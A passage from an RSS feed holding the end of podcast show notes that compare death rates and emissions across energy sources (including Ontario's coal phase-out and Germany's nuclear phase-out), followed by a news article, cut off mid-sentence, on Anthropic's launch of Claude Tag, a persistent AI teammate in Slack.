32 Studies or Articles on Estimates of Relative Safety</p>

<p>

</p>

<p>
Despite the difficulties of comparing the safety of different sources of energy, some people have attempted this anyway.</p>

<p>
Different estimates done at different times had different focuses, so unfortunately we do not have a nice set of studies that we can neatly use to cross check one another.</p>

<p>
I will however list the names and the authors and summarize the results.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
33 The Health Hazards of Not Going Nuclear</p>

<p>
By Dr. Petr Beckman</p>

<p>
Published in 1976</p>

<p>

</p>

<p>
The author of this book tried to address the relative safety of different sources of energy in the mid 1970s.</p>

<p>
However, it is old at this point, so I won't bother digging through its pages to find his figures.</p>

<p>

</p>

<p>
34</p>

<p>
He mainly focused on comparing electric power generated with coal to nuclear. </p>

<p>
His conclusion was that if the goal was to prevent deaths or ill health in the process of generating electricity, then the logical conclusion was to replace coal fired power plants with nuclear.</p>

<p>

</p>

<p>
35</p>

<p>
The book was relatively well known at the time, as least as far as books on energy are concerned, so I thought it was still worth mentioning.</p>

<p>
I happen to have a copy of this book which I bought back in that time period</p>

<p>
It was the 8th printing of the book, so it would appear to have had relatively good sales. </p>

<p>

</p>

<p>
36</p>

<p>
The author did address the issue of what I have termed "catastrophism" in his comparison of different energy sources, although I don't know if he used this phrase.</p>

<p>
I don't know if he was the first to use this sort of analysis, but he certainly was very influential in terms of popularizing it.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
37 Risk of Energy Production</p>

<p>
by Herbert Inhaber</p>

<p>
Publication AECB 1119</p>

<p>
March 1978</p>

<p>

</p>

<p>
This study is a scientific paper from the same time period as the book "The Health Hazards of Not Going Nuclear".</p>

<p>

</p>

<p>
38</p>

<p>
He based his risk estimates largely on estimates of the amount of material which was used in the construction and operation of various power sources.</p>

<p>
While we could argue over whether or not this is a valid methodology, I think any such argument would be pointless as I think the age of the study alone renders it not relevant today anyway.</p>

<p>
Advancements in materials have changed the basis results significantly by now.</p>

<p>
However, as it exists I thought I would mention it to show that the idea of comparing energy sources to each other is not a new one.</p>

<p>
The author compared a wider variety of potential sources than Beckman did. </p>

<p>

</p>

<p>
39</p>

<p>
Here's his conclusions.</p>

<p>
He assumes equal amounts of energy produced by each method.</p>

<p>
The numbers are normalized such that the total sums to 100%.</p>

<p>
You can think of it in terms of what proportion of total deaths or injuries would result from each source if each were equally used. </p>

<p>

</p>

<p>
40</p>

<p>
Coal 27.5%</p>

<p>
Oil 25.6%</p>

<p>
Methanol 16.7%</p>

<p>
Wind 10.8%</p>

<p>
Solar photovoltaic 9.2%</p>

<p>
Thermal 8.1%</p>

<p>
Solar space heating 1.5%</p>

<p>
Ocean thermal 0.4%</p>

<p>
Nuclear 0.13%</p>

<p>
Natural Gas 0.08%</p>

<p>

</p>

<p>
41</p>

<p>
His natural gas estimate is drastically different from that of other authors. </p>

<p>
I am not going to worry about explaining it however, as the study is as I said old enough to be not very relevant anyway.</p>

<p>
I am mainly including this here out of historical interest. </p>

<p>

</p>

<p>
42</p>

<p>
As a footnote, the methanol he refers to would be synthesized from wood. This was a popular idea in that era as a means of providing liquid fuels for transportation. Practical battery electric cars in those days were strictly science fiction.</p>

<p>

</p>

<p>
43</p>

<p>
The ocean thermal category is a real blast from the past and I had forgotten all about that concept.</p>

<p>
It was a very popular idea at that time and was supposed to be *the* big and upcoming thing in renewable energy.</p>

<p>
It involved various means of attempting to extract energy from differences in water temperature at different depths in the ocean. </p>

<p>
It gradually faded away however, as despite great efforts being put into it, designs never proved to be practical.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
44 Electricity generation and health</p>

<p>
Anil Markandya, Paul Wilkinson</p>

<p>
Published in the Lancet, Vol 370, 15 September 2007</p>

<p>

</p>

<p>
45</p>

<p>
This is more recent than the previous one, although it is nearly 20 years old at this point.</p>

<p>
Unfortunately it doesn't cover wind or solar, just fossil fuels and nuclear.</p>

<p>
However it is still useful, and the Lancet is a very reputable peer reviewed journal.</p>

<p>

</p>

<p>
46</p>

<p>
I will present just the results rather than discussing the whole paper. </p>

<p>
The authors  break it down into deaths among the public, occupational deaths, and air pollution related deaths, serious illness, and minor illness.</p>

<p>

</p>

<p>
47</p>

<p>
They  break the energy sources down into lignite, coal, gas, oil, biomass, and nuclear. </p>

<p>
Lignite is a type of very low grade coal used mainly for electric power generation. </p>

<p>
In this paper biomass refers to energy crops and forest residues.</p>

<p>

</p>

<p>
48</p>

<p>
I will summarize the results by category rather than trying to describe a table that has 6 rows and 5 columns.</p>

<p>

</p>

<p>
All numbers are normalized in terms of deaths or cases per TWh.</p>

<p>

</p>

<p>
49</p>

<p>
Occupational deaths from accidents</p>

<p>
lignite 0.1 </p>

<p>
coal 0.1 </p>

<p>
gas 0.001</p>

<p>
 oil no data</p>

<p>
biomass - no data</p>

<p>
Nuclear is 0.019. </p>

<p>

</p>

<p>
50</p>

<p>
Deaths among the public from accidents</p>

<p>
lignite 0.02 </p>

<p>
coal 0.02 </p>

<p>
gas 0.02</p>

<p>
 oil 0.03</p>

<p>
biomass no data</p>

<p>
Nuclear 0.003</p>

<p>

</p>

<p>
51</p>

<p>
Air pollution deaths</p>

<p>
lignite 32.6</p>

<p>
coal 24.5</p>

<p>
gas 2.8</p>

<p>
 oil 18.4</p>

<p>
biomass 4.63</p>

<p>
Nuclear 0.052</p>

<p>

</p>

<p>
52</p>

<p>
Air pollution serious illnesses</p>

<p>
lignite 298</p>

<p>
coal 225</p>

<p>
gas 30</p>

<p>
 oil 161</p>

<p>
biomass 43</p>

<p>
Nuclear 0.22</p>

<p>

</p>

<p>
53</p>

<p>
Air pollution minor illnesses</p>

<p>
lignite 17,676</p>

<p>
coal 13,288</p>

<p>
gas 703</p>

<p>
 oil 9,551</p>

<p>
biomass 2,276</p>

<p>
Nuclear no data</p>

<p>

</p>

<p>
54</p>

<p>
Natural gas edges out nuclear power slightly in terms of occupational safety, but in every other category nuclear is drastically lower in terms of ill effects than any of the alternatives.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>

<p>
55 2020 Fatalities for US Roofers Increased 15% as Solar Roof Installations Increase</p>

<p>
Published in The Next Big Future</p>

<p>
July 6, 2021 by Brian Wang</p>

<p>

</p>

<p>
56</p>

<p>
This seems to be written by someone who has a popular science blog.</p>

<p>
I'm not familiar with it personally, but he addresses the subject so I'll list it.</p>

<p>

</p>

<p>
The title implies that it's all about rooftop solar, but he provides comparative numbers for the other energy sources of interest, so that is useful for our purposes.</p>

<p>
However, he doesn't describe his methodology, so we need to treat them with some caution.</p>

<p>

</p>

<p>
Here are his results</p>

<p>
These are deaths per thousand terawatt hours.</p>

<p>

</p>

<p>
57</p>

<p>
Coal - 100,000</p>

<p>
Oil - 36,000</p>

<p>
Natural gas - 4,000</p>

<p>
Hydro - 1,400</p>

<p>
Rooftop solar - 440</p>

<p>
Wind - 150</p>

<p>
Nuclear - 90</p>

<p>

</p>

<p>
58</p>

<p>
If we plot these numbers on a bar chart, coal and oil are so large that all of the others are squished to the  bottom of the chart and are difficult to see at all.</p>

<p>

</p>

<p>
Let's therefore look at these in terms of orders of magnitude.</p>

<p>
Keep in mind that this is a logarithmic scale.</p>

<p>
This means that the difference between 4 and 5 is much greater in linear terms than the difference between 1 and 2. </p>

<p>

</p>

<p>
59</p>

<p>
Coal - 5</p>

<p>
Oil - 4</p>

<p>
Natural gas - 3</p>

<p>
Hydro - 3</p>

<p>
Rooftop solar - 2</p>

<p>
Wind - 2</p>

<p>
Nuclear - 1</p>

<p>

</p>

<p>
60</p>

<p>
Each of these numbers represents an order of magnitude, that is a power of ten. </p>

<p>
We can see that with rooftop solar, wind, and nuclear, the numbers are so close and the uncertainties are so great and their relative values so small compared to say coal that they can be seen as equivalent so far as safety is concerned.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
61 What are the safest and cleanest sources of energy?</p>

<p>
by Hannah Ritchie</p>

<p>
Published in Our World in Data</p>

<p>
First published in 2017, updated in 2022 and 2024</p>

<p>

</p>

<p>
62</p>

<p>
The author of this study addressed both deaths and greenhouse gas emissions.</p>

<p>
Deaths from accidents and air pollution are normalized to per TWh of electricity, while greenhouse gas emissions are normalized to GWh of electricity over the life cycle of the plant.</p>

<p>

</p>

<p>
63</p>

<p>
Here are the death figures.</p>

<p>
Coal 24.6</p>

<p>
Oil 18.4</p>

<p>
Biomass 4.6</p>

<p>
Natural Gas 2.8</p>

<p>
Hydro power 1.3</p>

<p>
Wind 0.04</p>

<p>
Nuclear 0.03</p>

<p>
Solar 0.02</p>

<p>

</p>

<p>
64</p>

<p>
For greenhouse gas emissions the figures are</p>

<p>
Coal 970 tons</p>

<p>
Oil 720 tons</p>

<p>
Natural gas 440 tons</p>

<p>
Biomass 78 to 230 tons</p>

<p>
Solar 53 tons</p>

<p>
Hydro power 24 tons</p>

<p>
Wind 11 tons</p>

<p>
Nuclear 6 tons</p>

<p>

</p>

<p>
65</p>

<p>
If we take the death figures and rank them by order of magnitude as we did with the previous article, we get the following.</p>

<p>

</p>

<p>
66</p>

<p>
Coal - 4</p>

<p>
Oil - 4</p>

<p>
Biomass - 3</p>

<p>
Natural Gas - 3</p>

<p>
Hydro power - 3</p>

<p>
Wind - 1</p>

<p>
Nuclear - 1</p>

<p>
Solar - 1</p>

<p>

</p>

<p>
67</p>

<p>
Keep in mind that the previous article covered only rooftop solar and not large industrial installations, and so is not directly comparable. </p>

<p>
Also the units are different, with the previous article being in terms of thousand TWh, and this one being in TWh. </p>

<p>
If we exclude solar (as the numbers are not comparable), Brian Wang's numbers are between 1.5 to 4 times higher than Ritchie's, except for hydro which are almost identical. I think this latter is due to both sets of numbers are dominated by one exceptionally big hydro accident. </p>

<p>

</p>

<p>
68</p>

<p>
Overall however, the relative rankings are quite comparable. </p>

<p>

</p>

<p>
Ritchie's numbers for deaths from coal, oil, and natural gas appear to be directly from the study by  Markandya and Wilkinson mentioned above.</p>

<p>

</p>

<p>
For the benefit of those who are wondering, Ritchie specifically states that her numbers for nuclear include the Chernobyl and Fukushima accidents. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>

<p>
https://www.iaea.org/publications/magazines/bulletin/21-1/solar-power-more-dangerous-nuclear</p>

<p>
Direct link to file</p>

<p>
https://www.iaea.org/sites/default/files/publications/magazines/bulletin/bull21-1/21104091117.pdf</p>

<p>

</p>

<p>
https://ourworldindata.org/safest-sources-of-energy</p>

<p>

</p>

<p>
https://www.thelancet.com/journals/lancet/article/PIIS0140-6736(07)61253-7/abstract</p>

<p>

</p>

<p>
https://www.nextbigfuture.com/2021/07/2020-fatalities-for-us-roofers-increased-15-as-solar-roof-installations-increase.html</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
69 Conclusion from Studies</p>

<p>

</p>

<p>
Remember that in engineering terms, when comparing groups of numbers which contain both both very small numbers and one or more very large numbers, the differences between the small numbers are often not significant. </p>

<p>
The differences between the small numbers may be the product of our ability to measure these things rather than any real differences. </p>

<p>

</p>

<p>
70</p>

<p>
For example, in the article by Ritchie wind power would appear to be twice as dangerous as nuclear.</p>

<p>
However, the difference between them is 0.02 compared to 24.6 for coal. </p>

<p>
In other words, the difference between apparently "dangerous" wind and apparently "safe" nuclear is equivalent to 0.08% of the total for coal. </p>

<p>
It's therefore meaningless and a red herring to even worry about.</p>

<p>

</p>

<p>
71</p>

<p>
With the above taken into consideration, generally the different sources of energy fall into two broad categories in terms of number of deaths, injuries, and illnesses.</p>

<p>
The fossil fuels and biomass fall into one group and wind, solar, and nuclear into another group.</p>

<p>

</p>

<p>
72</p>

<p>
Hydro power would seem to fall into the higher risk category or at least somewhere between the two,  but this I suspect is mainly due to one exceptionally large dam collapse in China, the Banqian Dam failure in 1975.</p>

<p>
This is mentioned as being specifically included in the article written by Ritchie.</p>

<p>
This was a multi-purpose dam, and information on this dam is difficult to find.</p>

<p>
It is not clear to me whether it had a hydro electric generator associated with either it or another dam that was part of the same system.</p>

<p>

</p>

<p>
73</p>

<p>
Some people therefor may argue for its exclusion from the numbers.</p>

<p>
Of course some people may argue for its inclusion anyway, as it was a dam regardless of whether it actually had an electric generator attached.</p>

<p>
If we exclude it, then I think the numbers for hydro power would fall into the same range as for nuclear, wind, and solar.</p>

<p>

</p>

<p>
74</p>

<p>
Most people would consider hydro power to be safe and clean enough regardless of this and I will rank it as such in any conclusions that I come to. </p>

<p>
As you can see, even if we have numbers, it can be a matter of opinion as to how to interpret them.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
75 Taking a Systems Approach</p>

<p>

</p>

<p>
Now let's take a look at the broader energy picture today and into the future.</p>

<p>
Many countries in many parts of the world have committed to the concept of "Net Zero", which means eliminating carbon emissions on a net basis.</p>

<p>
Net zero essentially means the complete electrification of society.</p>

<p>
We must therefore have electrical energy on demand and at low cost.</p>

<p>
We must as a result of this look at complete electrical systems rather than individual sources in isolation.</p>

<p>

</p>

<p>
76</p>

<p>
At one time many electrical systems were entirely coal or entirely hydroelectric.</p>

<p>
This is no longer the case.</p>

<p>
There are now major amounts of wind and solar involved in many countries.</p>

<p>
However these are inherently intermittent.</p>

<p>
This means that other sources of energy are inherently also required to have a functional system.</p>

<p>

</p>

<p>
77</p>

<p>
If any particular solution inherently requires fossil fuels to meet part of the demand, then the safety, pollution, and climate issues relating to those fossil fuels have to be factored in to that complete system when trying to come up with a relative ranking.</p>

<p>

</p>

<p>
Talking about Individual sources in isolation are therefore meaningless in these countries.</p>

<p>

</p>

<p>
78</p>

<p>
There are battery systems,  but these are mainly used to stabilize and regulate the grid plus to a lesser degree to smooth out short term daily peaks in demand. </p>

<p>
They do not have the ability to store large amounts of electricity on a large scale for an entire grid for days, weeks, and months to make up for intermittency. </p>

<p>

</p>

<p>
79</p>

<p>
So a serious attempt to rank sources of energy would need to look at a variety of representative countries and for each one come up with a plan that involves 'x' megawatts from source 'a', 'y' megawatts from source 'b', etc., and total up the values for each. </p>

<p>

</p>

<p>
80</p>

<p>
I am not aware of anyone who has studied this larger issue.</p>

<p>
However, the problem has to be addressed from this perspective in order for any answer to be useful.</p>

<p>
Not taking this into account is like ordering a diet soft drink to go with with a high calorie meal and assuring yourself that your plans to diet are fine. </p>

<p>

</p>

<p>
81</p>

<p>
This is not to imply there is anything inherently wrong with wind or solar.</p>

<p>
It does mean that if your goal is to achieve both net zero and a clean environment, you have to look at your entire energy system as a complete system rather than focusing on what you feel are the most reassuring parts of it while ignoring the rest.</p>

<p>

</p>

<p>
This does however add to the argument that it is in fact inherently very difficult to come up with a system of ranking energy sources for safety.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
82 Nuclear, Climate, and Clean Air - Contrasting Examples</p>

<p>

</p>

<p>
To give a tangible example we will now look at two different places that followed two divergent paths at roughly around the same time frame.</p>

<p>

</p>

<p>
These are the province of Ontario in Canada, and Germany. </p>

<p>

</p>

<p>
83</p>

<p>
Ontario had a mix of coal, hydro electric, and nuclear generating plants.</p>

<p>
Germany had a mix of coal, nuclear and natural gas plants.</p>

<p>

</p>

<p>
Ontario shut down their coal fired plants and kept their nuclear plants.</p>

<p>
Germany however shut down their nuclear plants and kept their coal fired plants.</p>

<p>

</p>

<p>

</p>

<p>
84 The Phase Out of Coal in Ontario</p>

<p>

</p>

<p>
In 2003 Ontario decided to close all of its coal fired generating plants, which consisted of 19 units (that is boilers and turbines) totalling 8,800 MW.</p>

<p>
This phase out was completed by 2014.</p>

<p>

</p>

<p>
85</p>

<p>
Here are the figures for amount of power generated by each energy source in 2003 and 2014.</p>

<p>
Nuclear went from 42% to 60%</p>

<p>
Hydro went from 23% to 24%</p>

<p>
Gas went from 11% to 9%</p>

<p>
Coal went from 25% to 0%</p>

<p>
Non-hydro renewable went from 0% to 7%.</p>

<p>

</p>

<p>
86</p>

<p>
As you can see, the bulk of that replacement came from increased use of nuclear power. </p>

<p>
Furthermore, this did not result in simply replacing coal with natural gas.</p>

<p>
While gas is cleaner than coal, it still has emissions and if you recall from the studies that we looked at earlier, had an estimated death rate roughly 2 orders of magnitude greater than nuclear, solar, or wind.</p>

<p>

</p>

<p>
87</p>

<p>
To put this in more practical terms, at one time Toronto regularly had clouds of smog obscuring it, to a large extent due to these coal fired power plants</p>

<p>

</p>

<p>
With the phase out of coal, smog days went to zero in 2015 compared to 53 a decade earlier.</p>

<p>

</p>

<p>
The 2023 figures for Ontario show carbon emissions of 53 grams per kWh of electricity generated.</p>

<p>
We can use this as a rough benchmark comparison for total emissions.</p>

<p>

</p>

<p>

</p>

<p>
88 The Phase out of Nuclear in Germany</p>

<p>
Until March of 2011, Germany generated one quarter of its electrical power from nuclear.</p>

<p>
Starting in 2011 however, they began shutting down their nuclear power plants.</p>

<p>
These were then phased out over the next decade.</p>

<p>
However, the coal plants were to be kept to 2038.</p>

<p>
In 2026 Germany began talking about increasing use of coal in order to save gas.</p>

<p>
In the same year the German chancellor Friedrich Merz stated that the phase out of nuclear was a </p>

<p>
quote  “serious strategic mistake”.</p>

<p>
EU Commission President Ursula von der Leyen said it was "a strategic mistake for Europe to turn its back on a reliable, affordable source of low-emissions power".</p>

<p>

</p>

<p>
89</p>

<p>
I won't go into the details of the phase out, but let's look at some emissions numbers for Germany.</p>

<p>
If we look at the official numbers from the European Environmental Agency for 2024, for Germany their emissions were 298 grams per kWh of electricity generated.</p>

<p>

</p>

<p>
Recall that we are using emissions as a very rough guide to amount of air pollution, and that this has a direct effect on the safety of the overall electrical energy system.</p>

<p>

</p>

<p>
90</p>

<p>
So, who actually made their people safer, Ontario who phased out their coal plants and kept their nuclear plants, or Germany who phased out their nuclear plants and kept their coal plants?</p>

<p>

</p>

<p>
91</p>

<p>
If you want a comparison directly within Europe, then Germany has one of the highest rates of emissions per kWh of electricity generated, whereas France, who use mainly nuclear power, have one of the lowest at 43 grams per kWh of electricity generated.</p>

<p>

</p>

<p>
Again, who is making their people safer, Germany or France?</p>

<p>

</p>

<p>
92</p>

<p>
I don't want to make it sound like I am picking on Germany.</p>

<p>
I am also not going to tell them how they ought to run their country. </p>

<p>
However they provide a good real world example of how we need to look at things in overall context when we are thinking about the choices that we make. </p>

<p>

</p>

<p>

</p>

<p>
https://www.ontario.ca/page/end-coal</p>

<p>
https://www.cbc.ca/news/canada/windsor/smog-study-shows-significant-decreases-in-pollutants-in-ontario-1.4151183</p>

<p>

</p>

<p>
https://www.eea.europa.eu/en/analysis/indicators/greenhouse-gas-emission-intensity-of-1</p>

<p>
https://world-nuclear.org/information-library/country-profiles/countries-g-n/germany</p>

<p>

</p>

<p>
https://www.politico.eu/article/friedrich-merz-is-right-to-reject-germanys-nuclear-phase-out-says-iea-chief-fatih-birol/</p>

<p>

</p>

<p>
https://www.politico.eu/article/germany-considers-ramping-up-coal-power-to-avert-energy-crisis/</p>

<p>

</p>

<p>
https://www.iea.org/countries/estonia/electricity</p>

<p>
https://www.iea.org/countries/malta/electricity</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>
 </p>

<p>
93 Conclusions</p>

<p>
As we can see, there don't appear to be an abundance of peer reviewed scientific studies that we can simply point to in order to answer the question of safety of all possible major different energy sources once and for all.</p>

<p>

</p>

<p>
Collecting the data to even attempt to answer the question is inherently very difficult as we cannot readily conduct experiments to answer the question, and sources of data are not collected or consolidated in a manner which can answer this question adequately.</p>

<p>

</p>

<p>
94</p>

<p>
The essence of the problem is that most energy industries are not as tightly regulated and monitored to the same degree that say nuclear power or commercial airliners are, so this data is simply not being systematically recorded.</p>

<p>

</p>

<p>
However, a number of people have attempted to make estimates.</p>

<p>

</p>

<p>
95</p>

<p>
Their conclusions would seem to be that nuclear, wind, and solar are roughly equivalent in terms of safety.</p>

<p>
All fossil fuels are much less safe than nuclear, wind, and solar, by as much as several orders of magnitude.</p>

<p>

</p>

<p>
96</p>

<p>
We can however say with a reasonable degree of certainty that if a country shut down their nuclear power plants and kept their fossil fuel plants, particularly coal, then they probably made their people less safe than if they had done things the other way around. </p>

<p>

</p>

<p>
97</p>

<p>
I hope that I have provided some context in which to think about the issue. </p>

<p>

</p>

<p>
Thanks again to brian in ohio for providing the question upon which this episode is based.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4668/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic launches Claude Tag, replacing its Slack app with a persistent AI teammate that learns, monitors and works autonomously]]></title>
<description><![CDATA[Anthropic on Tuesday launched Claude Tag, a new product that embeds its most advanced AI model directly inside Slack as a persistent, shared teammate that anyone on a team can delegate work to by simply typing @Claude.The product, available today in beta for Claude Enterprise and Team customers, ...]]></description>
<link>https://tsecurity.de/de/3619113/it-nachrichten/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619113/it-nachrichten/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously/</guid>
<pubDate>Tue, 23 Jun 2026 19:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a> on Tuesday launched <a href="http://anthropic.com/news/introducing-claude-tag"><u>Claude Tag</u></a>, a new product that embeds its most advanced AI model directly inside Slack as a persistent, shared teammate that anyone on a team can delegate work to by simply typing @Claude.</p><p>The product, available today in beta for<a href="https://support.claude.com/en/articles/9797531-what-is-the-enterprise-plan"> Claude Enterprise</a> and <a href="https://support.claude.com/en/articles/9266767-what-is-the-team-plan">Team</a> customers, replaces Anthropic's existing Claude in Slack app and represents the company's most aggressive move yet to colonize the enterprise collaboration layer — the place where decisions get made, work gets assigned, and institutional knowledge accumulates in real time.</p><p>For enterprise technology leaders who have spent the past two years evaluating where AI fits into their operational stack, <a href="https://venturebeat.com/technology/anthropic.com/news/introducing-claude-tag">Claude Tag</a> reframes the question entirely. This is not a chatbot, a coding assistant, or a search tool bolted onto a messaging platform. It is an AI agent designed to function as a standing member of a team — one that builds memory, takes initiative, works asynchronously, and interacts with every person in a channel rather than serving a single user. The implications for enterprise workflow, governance, and vendor strategy are significant.</p><p>Anthropic says 65% of its own product team's code is now created by its internal version of Claude Tag, and the company runs internal support and data insight channels through the same system. The claim is striking: Anthropic is asserting that the majority of its own product engineering output already flows through the tool it just put in customers' hands.</p><div></div><h2><b>How Claude Tag works inside enterprise Slack channels</b></h2><p>At its core, <a href="https://venturebeat.com/technology/anthropic.com/news/introducing-claude-tag">Claude Tag</a> works like this: an administrator pairs it with a Slack workspace, grants it access to specific tools and data sources, sets spending limits, and defines which channels it can operate in. From that point on, any team member in those channels can tag @Claude with a request — write a pull request, pull sales numbers, run a data analysis — and Claude will break the task into stages, execute them using the tools it has access to, and respond in a Slack thread with the result. The product runs on <a href="https://www.anthropic.com/news/claude-opus-4-8">Claude Opus 4.8</a>, the model Anthropic released less than a month ago.</p><p>Four capabilities differentiate <a href="https://www.anthropic.com/news/introducing-claude-tag">Claude Tag </a>from its predecessors and from competing integrations. First, it is multiplayer. Within a given Slack channel, there is one Claude that interacts with everyone, not a separate instance per user. Anyone can see what it is working on, and anyone can pick up the conversation where the last person left off. This is a direct contrast to most existing AI integrations in Slack, which tend to operate as single-player tools.</p><p>Second, it learns over time. As Claude follows along with its channel, it accumulates context about the work happening there. Users do not need to re-explain projects from scratch. If granted permission, Claude can also pull context from other Slack channels and data sources, though Anthropic says it will not report from private channels. Third, it takes initiative. With ambient behavior enabled, Claude will proactively surface relevant information from across the channels it monitors and the tools it is connected to, and will follow up on threads or tasks that have gone quiet without resolution. This is a notable expansion of agency: Claude is not just responding to requests but monitoring the information environment and deciding what its human teammates need to know. Fourth, it works asynchronously, pursuing projects autonomously over hours or days. Anthropic says its own teams "now spend much more of our time delegating tasks to many Claudes in parallel."</p><h2><b>Enterprise security controls and administrative governance get a central role</b></h2><p><a href="https://www.anthropic.com/">Anthropic</a> has designed the system with enterprise-grade isolation at its center. System administrators define separate Claude identities for different uses, scoped to specific channels with specific tools and data access. Everything, including Claude's accumulated memories, stays within those boundaries. A Claude configured for sales work will not share memories or data access with one configured for engineering.</p><p>Administrators can set token-spend limits at both the organizational and channel level, and can review a complete log of every action Claude has taken and which user requested each task. For organizations managing compliance, audit, or regulatory requirements, this logging and scoping architecture is table stakes — and its absence has been a dealbreaker for many enterprises evaluating AI collaboration tools over the past year.</p><p>Migration from the existing <a href="https://slack.com/marketplace/A08SF47R6P4-claude">Claude in Slack app</a> requires an administrator opt-in within 30 days, and Anthropic says it is issuing introductory launch credits to eligible Enterprise and Team organizations. The four-step setup process — pair with Slack, connect tools, set spend limits, test in a private channel — is designed to reduce friction for IT teams already managing sprawling SaaS portfolios.</p><h2><b>The Slack battleground is now the most contested real estate in enterprise AI</b></h2><p><a href="https://venturebeat.com/technology/anthropic.com/news/introducing-claude-tag">Claude Tag</a> arrives in the middle of what has become the most fiercely contested territory in enterprise AI: the Slack channel. Slack itself has been aggressively positioning the platform as an "agentic operating system," and the major AI players have responded by racing to plant their flags.</p><p>Salesforce, which <a href="https://slack.com/blog/news/salesforce-completes-acquisition-of-slack">acquired Slack for $27.7 billion in 2021</a>, announced more than <a href="https://venturebeat.com/orchestration/slack-adds-30-ai-features-to-slackbot-its-most-ambitious-update-since-the">30 new capabilities for Slackbot</a> in March — the most sweeping overhaul of the platform since the acquisition — transforming it from a simple conversational assistant into a full-spectrum enterprise agent. OpenAI introduced "<a href="https://openai.com/index/introducing-workspace-agents-in-chatgpt/">Workspace Agents</a>" in April, allowing enterprise subscribers to design agents that take on work tasks across third-party apps including Slack, Google Drive, Microsoft apps, Salesforce, and Notion. Perplexity launched its enterprise "Computer" agent with direct Slack integration, letting employees query @computer directly inside Slack channels. Cognition's Devin, the autonomous AI software engineer, has been built around Slack as a primary interface since its early days. Even Microsoft has brought GitHub Copilot into Teams.</p><p>The logic driving this convergence is straightforward: the average enterprise juggles over 1,000 applications, and employees waste countless hours on context switching, draining productivity by up to 40%. Whichever AI system becomes the default presence in the communication layer where work is coordinated gains an enormous distribution advantage — and, critically, an enormous data advantage. The AI that lives in the channel where work happens absorbs the institutional context that makes it increasingly difficult to replace.</p><h2><b>Anthropic built Claude Tag on a foundation two years in the making</b></h2><p>To understand Claude Tag's strategic significance, it helps to trace the product arc that led to it. Anthropic first integrated Claude with Slack in October 2025, offering two-way connectivity: users could invoke Claude from within Slack or connect Slack as a data source for Claude's chatbot. As TechCrunch reported at the time, the initial integration was focused on individual productivity — direct messages, AI assistant panels, and thread participation. In January 2026, Anthropic expanded Claude's Slack presence when it launched interactive Claude apps, which TechCrunch's Russell Brandom reported included workplace tools like Slack, Canva, Figma, Box, and Clay.</p><p>In parallel, Anthropic was building out its enterprise infrastructure stack. As TechCrunch reported in August 2025, the company bundled Claude Code into enterprise plans, a move its product lead Scott White called "the most requested feature from our business team and enterprise customers." In April 2026, Anthropic launched Claude Managed Agents, a suite of composable APIs for building and deploying cloud-hosted AI agents at scale, with early adopters including Notion, Rakuten, Asana, and Sentry. As The New Claw Times reported, the move positioned Anthropic "as a direct competitor to AWS Bedrock Agents and Google Vertex Agent Builder."</p><p>Then came Claude Opus 4.8 in late May, which Anthropic described as "a more effective collaborator" with "sharper judgement, more honesty about its progress, and the ability to work independently for longer than its predecessors." As 9to5Mac reported, benchmark improvements included a jump in agentic coding scores from 64.3% to 69.2% and a knowledge work score increase from 1753 to 1890. Claude Tag is the synthesis of all of these threads — combining the Slack channel presence, the enterprise security architecture, the Managed Agents infrastructure, and the Opus 4.8 model's improved agentic capabilities into a single product that Anthropic frames as "the beginning of an evolution of Claude Code."</p><h2><b>Anthropic's explosive growth explains why it is betting big on the collaboration layer</b></h2><p>The financial stakes behind this launch are enormous. Anthropic raised $65 billion in Series H funding in late May at a $965 billion post-money valuation, and its run-rate revenue crossed $47 billion earlier this month. Claude Code's run-rate revenue alone has grown to over $2.5 billion, more than doubling since the beginning of 2026, and enterprise use has grown to represent over half of all Claude Code revenue.</p><p>Those numbers explain why Anthropic is investing so heavily in channel-level presence. Every enterprise customer who grants Claude persistent access to a Slack channel — with connected tools, accumulated context, and ambient monitoring enabled — represents a dramatically deeper integration than a chatbot conversation or an API call. The usage patterns become stickier, the token consumption grows, and the switching costs rise. Deloitte's deployment of Claude across more than 470,000 employees in 150 countries — reportedly its largest-ever enterprise AI deployment — illustrates the scale at which these dynamics play out.</p><p>The broader market trajectory reinforces the bet. Fortune Business Insights projects the global agentic AI market will grow from $9.14 billion in 2026 to $139 billion by 2034, and Gartner forecasts that 40% of enterprise applications will feature task-specific AI agents by 2026, up from less than 5% in 2025. Anthropic is not alone in seeing this future, but with Claude Tag it is making one of the most direct plays yet to own the enterprise agent layer.</p><h2><b>The risks enterprise buyers need to weigh before granting Claude a permanent seat at the table</b></h2><p>Claude Tag raises several questions that enterprise buyers will need to evaluate carefully. The first is vendor dependency. As The New Stack noted when analyzing Claude Managed Agents earlier this year, once an organization's agents, operational configurations, and monitoring run on Anthropic's managed infrastructure, switching costs increase significantly. Claude Tag deepens this dynamic: a Claude that has accumulated months of channel context and institutional memory becomes very difficult to replace. Enterprise procurement teams accustomed to negotiating multi-cloud flexibility will need to think hard about what it means to give a single vendor's AI persistent access to the communication layer where institutional knowledge lives.</p><p>The second is governance around ambient monitoring. The proactive behavior mode — in which Claude monitors channels and surfaces information it decides is relevant — represents a meaningful expansion of what enterprise AI systems do. Organizations will need to develop clear frameworks for an AI agent that is not just responding to requests but 